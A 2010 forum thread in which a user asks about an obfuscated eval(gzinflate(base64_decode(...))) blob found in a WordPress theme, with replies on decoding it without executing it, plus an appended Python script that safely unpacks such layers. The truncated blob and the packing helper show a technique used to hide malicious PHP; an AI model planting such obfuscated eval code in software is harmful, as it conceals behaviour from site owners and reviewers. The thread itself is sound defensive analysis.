OM2 Posted December 5, 2010

I have some PHP code that looks really dodgy.
I was given a WordPress theme to install for someone.
Don't know why, I just thought I would check a few of the files before I installed on my server.
I've always thought it would be easy to hijack a server by using malicious code.
Don't know if the code would make sense, but I thought I'd give a snippet:

<? eval(gzinflate(base64_decode('... ... ... WRAT37W3+ldgc82VddtuetUZ7xH2clfi+VxOKhhCKsTwKyZgZP5kV13qHwxIR1aJMfgax3Ipx6qKSdsmmaQ5oL3PROPx72pA+TK81pxRxJMb4jBDYl4By4QSTHJeEuoHUiRMUnw3FuuhYUD6BTnCQWFx533VWUDCR7xqMuAL8wMMN9M6EBTiILwyZTEwk589Z5tJxEy6nM4auIJwL7TCSOIicpIz61jrcXG3imuJx3zHq/HTLpHoFbO2lu3klsZySnQ7fAhztFEFVUwxhYVgVxQ62GOkVcbxydLJgWcbJZksvjvapHb1LLcXRCnXJfbb1VTYTKxZbBvvDtLNbqlaC/ortDoOKhGkSfd5NpltjIp9f5gq/4SOT9bNXqsk118wmR/M5xO+NsIAG+Vd+WXADiysXDczyPAnG3o870gkaC3rERGuxzhWTqYfpcGuWC4Xd1qOtNnMqInNpNo1SJsf1Zk+wjBkciD/mFBiXEbac7Qx9pgFq5X09LEHyeUvsbylh8O3b8v3y/sXA//3nn3/+8z///t9///1/'))); ?>

The above is just a snippet of the beginning and end.
I won't be installing the theme on my server!
What is the code though?? What can it do?
Is it likely to be malicious??
Thanks
OM

cigardude Posted December 6, 2010

Save everything after base64_decode(' into a text file. Rename the text file to .uue and open with winzip. Should decode the text file for you.

Or make a new php page:

<?php
// Decode the payload and print it instead of handing it to eval()
$contents = gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/i.........'));
echo $contents;

OM2 Posted December 6, 2010

hmmm ok - i can do
so u think it might not be malicious code in that case?
would such code actually execute and do 'something'?
the actual file was about 130kb - which is huge for a php file - i would assume that would be 10000 lines of code or something?
let me know what u think
thanks

BlueSkyIS Posted December 6, 2010

the code is obfuscated for one or two reasons:
1. to slightly prevent modification of the code
and/or
2. it is malicious.

as long as you remove the eval() from around the code, it will not execute. just like cigardude said.

OM2 Posted December 6, 2010

thanks - that's great advice
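
Added example, not part of the original thread: the "decode it, don't eval it" approach from the replies above, done in Python so that no PHP interpreter ever touches the file. It goes beyond the thread by peeling nested wrappers and capping the decoded size; the function names, the limits and the sample input are assumptions constructed for illustration.

```python
import base64
import re
import zlib

# Matches eval(gzinflate(base64_decode('...'))) with single or double quotes.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
MAX_LAYERS = 20               # assumption: give up on pathological nesting
MAX_BYTES = 5 * 1024 * 1024   # assumption: cap output against decompression bombs


def inflate_raw(blob: bytes) -> bytes:
    """PHP's gzinflate() reads raw DEFLATE, which is zlib with wbits=-15."""
    d = zlib.decompressobj(-15)
    out = d.decompress(blob, MAX_BYTES)
    if not d.eof:  # stream did not finish within the cap, or was cut short
        raise ValueError("layer is truncated or larger than MAX_BYTES")
    return out


def unwrap(php_source: str) -> tuple[str, int]:
    """Return (innermost source, layers peeled). Nothing is ever executed."""
    layers = 0
    while layers < MAX_LAYERS:
        m = WRAPPER.search(php_source)
        if not m:
            break
        raw = base64.b64decode(m.group(2))
        php_source = inflate_raw(raw).decode("utf-8", errors="replace")
        layers += 1
    return php_source, layers


def wrap(php_source: str) -> str:
    """Build a constructed test sample the way such a packer would."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(php_source.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()


if __name__ == "__main__":
    # Constructed, harmless stand-in for an obfuscated theme file, two layers deep.
    sample = "<? " + wrap(wrap("echo 'footer links';")) + " ?>"
    code, depth = unwrap(sample)
    print(f"peeled {depth} layer(s):\n{code}")
```

Read the printed result as text only; a pattern that stops matching before readable PHP appears means the next layer uses a different wrapper.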